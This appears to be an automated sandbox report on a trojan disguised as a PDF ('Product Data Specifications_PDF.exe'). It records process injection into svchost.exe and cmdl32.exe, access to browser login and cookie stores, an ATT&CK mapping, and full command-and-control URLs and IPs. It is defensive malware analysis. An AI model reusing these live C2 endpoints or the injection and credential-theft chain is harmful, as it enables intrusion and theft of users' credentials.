            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtOpenSection: Direct from: 0x77762E0C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtQueryValueKey: Direct from: 0x77762BEC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtQueryInformationToken: Direct from: 0x77762CAC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtTerminateThread: Direct from: 0x77762FCC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtCreateFile: Direct from: 0x77762FEC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtOpenFile: Direct from: 0x77762DCC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtOpenKeyEx: Direct from: 0x77762B9C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtSetInformationProcess: Direct from: 0x77762C5C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmdl32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: read write
            Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdl32.exe | Thread register set: target process: 7836
            Source: C:\Windows\SysWOW64\cmdl32.exe | Thread APC queued: target process: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: BFF008
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00436CD7 LogonUserW
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | Process created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"
            Source: C:\Windows\SysWOW64\cmdl32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: Product Data Specifications_PDF.exe, EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
            Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: Product Data Specifications_PDF.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00472C3F GetUserNameW
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

            Stealing of Sensitive Information

            Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\cmdl32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\cmdl32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Product Data Specifications_PDF.exe | Binary or memory string: WIN_XP
            Source: Product Data Specifications_PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: Product Data Specifications_PDF.exe | Binary or memory string: WIN_XPe
            Source: Product Data Specifications_PDF.exe | Binary or memory string: WIN_VISTA
            Source: Product Data Specifications_PDF.exe | Binary or memory string: WIN_7
            Source: Product Data Specifications_PDF.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
Mitre Att&ck Matrix

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 16 System Information Discovery; 141 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1519456; Sample: Product Data Specifications...; Startdate: 26/09/2024; Architecture: WINDOWS; Score: 100)

Start node
• Contacts: www.mktimediato.online; www.dfmagazine.shop; 6 other IPs or domains
• Signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 6 other signatures
• Starts: Product Data Specifications_PDF.exe

Product Data Specifications_PDF.exe
• Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
• Starts: svchost.exe

svchost.exe
• Signatures: Maps a DLL or memory area into another process
• Injects into: EyHLOQmzGKBL.exe

EyHLOQmzGKBL.exe (injected)
• Signatures: Found direct / indirect Syscall (likely to bypass EDR)
• Starts: cmdl32.exe

cmdl32.exe
• Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
• Injects into: EyHLOQmzGKBL.exe
• Starts: firefox.exe

EyHLOQmzGKBL.exe (injected from cmdl32.exe)
• Contacts: www.trapkitten.website (195.161.68.8, ports 49704, 80; RTCOMM-ASRU, Russian Federation); www.qwefs.org (45.114.171.236, ports 49706, 49707, 49708; POWERLINE-AS-APPOWERLINEDATACENTERHK, Hong Kong); 4 other IPs or domains
• Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label | Link
Product Data Specifications_PDF.exe | 55% | ReversingLabs | Win32.Trojan.AbuseCommBack |
Product Data Specifications_PDF.exe | 100% | Avira | HEUR/AGEN.1321671 |
Product Data Specifications_PDF.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://www.kevin-torkelson.info/__media__/js/trademark.php?d=kevin-torkelson.info&type=ns | 0% | Avira URL Cloud | safe |
http://www.qwefs.org/toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZ | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/pics/28903/search.png) | 0% | Avira URL Cloud | safe |
https://cdn.consentmanager.net | 0% | Avira URL Cloud | safe |
https://dts.gnpge.com | 0% | Avira URL Cloud | safe |
http://www.dfmagazine.shop/wc8m/ | 0% | Avira URL Cloud | safe |
http://www.Kevin-torkelson.info | 0% | Avira URL Cloud | safe |
http://www.kevin-torkelson.info/Anti_Wrinkle_Creams.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa | 0% | Avira URL Cloud | safe |
http://www.kevin-torkelson.info/High_Speed_Internet.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | 0% | Avira URL Cloud | safe |
http://www.mandemj.top | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | 0% | Avira URL Cloud | safe |
http://www.kevin-torkelson.info/fashion_trends.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZHr | 0% | Avira URL Cloud | safe |
http://www.trapkitten.website/vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqg | 0% | Avira URL Cloud | safe |
http://www.kevin-torkelson.info/gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ | 0% | Avira URL Cloud | safe |
http://www.kevin-torkelson.info/Parental_Control.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZ | 0% | Avira URL Cloud | safe |
http://www.kevin-torkelson.info/__media__/design/underconstructionnotice.php?d=kevin-torkelson.info | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/pics/29590/bg1.png) | 0% | Avira URL Cloud | safe |
https://delivery.consentmanager.net | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | 0% | Avira URL Cloud | safe |
http://www.mandemj.top/to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | 0% | Avira URL Cloud | safe |
https://jino.ru | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/pics/28905/arrrow.png) | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | 0% | Avira URL Cloud | safe |
http://www.kevin-torkelson.info/All_Inclusive_Vacation_Packages.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2F | 0% | Avira URL Cloud | safe |
http://www.disn-china.buzz/za6x/ | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular | 0% | Avira URL Cloud | safe |
http://www.disn-china.buzz/za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GM | 0% | Avira URL Cloud | safe |
http://www.kevin-torkelson.info/gekb/ | 0% | Avira URL Cloud | safe |
http://www.mandemj.top/to69/ | 0% | Avira URL Cloud | safe |
http://www.qwefs.org/toq1/ | 0% | Avira URL Cloud | safe |
http://i3.cdn-image.com/__media__/js/min.js?v2.3 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.qwefs.org | 45.114.171.236 | true | false | | unknown
www.mandemj.top | 162.0.238.43 | true | false | | unknown
www.trapkitten.website | 195.161.68.8 | true | false | | unknown
www.disn-china.buzz | 161.97.168.245 | true | false | | unknown
dfmagazine.shop | 84.32.84.32 | true | false | | unknown
www.kevin-torkelson.info | 208.91.197.27 | true | false | | unknown
www.dfmagazine.shop | unknown | unknown | true | | unknown
www.mktimediato.online | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.qwefs.org/toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZ | false | Avira URL Cloud: safe | unknown
http://www.dfmagazine.shop/wc8m/ | false | Avira URL Cloud: safe | unknown
http://www.trapkitten.website/vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqg | false | Avira URL Cloud: safe | unknown
